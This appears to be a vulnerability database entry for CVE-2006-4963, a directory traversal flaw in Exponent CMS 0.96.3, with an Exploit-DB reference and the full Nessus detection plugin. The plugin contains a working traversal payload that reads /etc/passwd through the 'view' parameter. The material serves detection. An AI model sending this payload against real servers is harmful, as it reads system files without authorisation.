Vulnerabilities > CVE-2006-4963 - Unspecified vulnerability in Exponent CMS 0.96.3

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
exponent
nessus
exploit available
NVD
Published: 2006-09-23
Updated: 2024-11-21

Summary

Directory traversal vulnerability in index.php in Exponent CMS 0.96.3 allows remote attackers to read and execute arbitrary local files via a .. (dot dot) sequence in the view parameter in the show_view action in the calendarmodule module, as demonstrated by executing PHP code through session files.

Vulnerable Configurations

Part Description Count
Application
Exponent
1

Exploit-Db

descriptionExponent CMS <= 0.96.3 (view) Remote Command Execution Exploit. CVE-2006-4963. Webapps exploit for php platform
fileexploits/php/webapps/2391.php
idEDB-ID:2391
last seen2016-01-31
modified2006-09-19
platformphp
port
published2006-09-19
reporterrgod
sourcehttps://www.exploit-db.com/download/2391/
titleExponent CMS <= 0.96.3 view Remote Command Execution Exploit
typewebapps

Nessus

NASL familyCGI abuses
NASL idEXPONENT_VIEW_FILE_INCLUDE.NASL
descriptionThe remote host is running Exponent CMS, an open source content management system written in PHP. The version of Exponent CMS installed on the remote host fails to properly sanitize user-supplied input to the
last seen2020-06-01
modified2020-06-02
plugin id22412
published2006-09-19
reporterThis script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/22412
titleExponent CMS index.php view Parameter Local File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(22412);
  script_version("1.22");

  script_cve_id("CVE-2006-4963");
  script_bugtraq_id(20111);
  script_xref(name:"EDB-ID", value:"2391");

  script_name(english:"Exponent CMS index.php view Parameter Local File Inclusion");
  script_summary(english:"Tries to read a local file in Exponent CMS");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to a
local file include issue." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Exponent CMS, an open source content
management system written in PHP. 

The version of Exponent CMS installed on the remote host fails to
properly sanitize user-supplied input to the 'view' parameter before
using it in the 'modules/calendarmodule/class.php' script to include
PHP code as part of its templating system.  Regardless of PHP's
'magic_quotes_gpc' and 'register_globals' settings, an unauthenticated,
remote attacker may be able to exploit this issue to view arbitrary
files or to execute arbitrary PHP code on the remote host, subject to
the privileges of the web server user id." );
  # http://oldsite.exponentcms.org/index.php?module=newsmodule&action=view&id=35
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bcb0a96b" );
 script_set_attribute(attribute:"solution", value:
"Apply the patches for 96.3 as described in the vendor's advisory
referenced above." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/09/19");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/09/20");
 script_cvs_date("Date: 2018/06/13 18:56:27");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:exponent:exponent_cms");
script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");


port = get_http_port(default:80, embedded:0);
if (!can_host_php(port:port)) exit(0);

# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/exponent", "/site", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Grab index.php.
  file = "../../../../../../../../../../etc/passwd%00";
  r = http_send_recv3(method:"GET",
    item:string(
      dir, "/index.php?",
      "src=1&",
      "_common=1&",
      "time=", unixtime(), "&",
      "action=show_view&",
      "module=calendarmodule&",
      "view=", file
    ),
    port:port
  );
  if (isnull(r)) exit(0);
  res = r[2];

  # There's a problem if there's an entry for root.
  if (egrep(pattern:"root:.*:0:[01]:", string:res))
  {
    contents = res;
    contents = strstr(contents, "perform this operation.");
    if (contents) contents = contents - "perform this operation.";
    if (contents) contents = contents - strstr(contents, "</td");

    if (contents && report_verbosity)
    {
      contents = data_protection::redact_etc_passwd(output:contents);
      report = string(
        "\n",
        "Here are the contents of the file '/etc/passwd' that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        contents
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port);

    exit(0);
  }
}

References